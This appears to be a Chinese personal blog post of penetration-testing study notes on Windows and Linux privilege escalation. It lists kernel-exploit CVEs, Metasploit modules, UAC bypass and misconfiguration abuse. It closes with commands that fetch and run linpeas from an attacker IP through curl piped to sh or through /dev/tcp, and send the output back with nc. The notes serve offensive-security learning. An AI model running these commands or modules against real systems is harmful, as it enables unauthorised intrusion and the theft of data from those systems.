
权限提升
用户权限说明
Windows
Users # 普通用户
Adminstrator # 管理员用户
Sytem # 系统用户
TrustedInstaller # 最高权限用户(服务)
Linux
root # 超级用户
sshd # 服务用户
kali # 普通用户
两种提权方式
-
横向提权
-
纵向提权
Windows 权限提升
内核漏洞提权
CVE-2018-8120.exe
meterpreter > upload /home/kali/Desktop/CVE-2018-8120.exe C:\\users\\xxx\\Desktop\\CVE-2018-8120.exe
meterpreter > shell 【chcp 65001】
C:\Users\xxx\Desktop>CVE-2018-8120.exe "whoami"
永恒之黑
msf6 > search CVE-2020-0796
msf6 > use exploit/windows/local/cve_2020_0796_smbghost
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set session 4
getsystem
错误配置提权
错误配置
注意架构问题
msf6 exploit(windows/local/cve_2020_0796_smbghost) > use exploit/windows/local/service_permissions
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set payload windows/x64/meterpreter/reverse_tcp
计划任务
略
注册表
略
DLL
略
数据库提权
略
绕过权限提权
bypassuac
use exploit/windows/local/bypassuac
use exploit/windows/local/ask
CS 插件提权
辅助提权
靠山吃山
https://lolbas-project.github.io/#
windows-exploit-suggester.py
略
winPEAS.bat
略
其他
访问令牌提权
略
土豆攻击
略
Linux 权限提升
内核提权
CVE-2016-5195
脏牛漏洞
CVE-2022-0847
脏管道
CVE-2021-4034
CVE-2024-1086
searchsploit 筛选
错误配置提权
crontab 计划任务提权
suid 提权
u+s
sudo 提权
辅助提权
靠山吃山
https://gtfobins.github.io/
谷歌搜索
https://www.exploit-db.com
优雅的运行 linpeas
1、落地执行
最常规的方式 -> 上传/下载 -> 给权限 -> 运行 -> 查看结果
2、不落地执行
目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh
3、不落地执行,并将执行输出回攻击机
目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
4、不落地执行,并将执行输出回攻击机并且保存成文件
攻击机:python3 -m http.server 12345
攻击机:nc -lvvp 81 | tee linpeas-result
目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
5、无wget/curl命令情况下执行
攻击机:nc -lvnp 81 < linpeas.sh
目标设备:cat < /dev/tcp/192.168.4.249/81 | bash
linux-exploit-suggester.sh
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 UrAsh
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果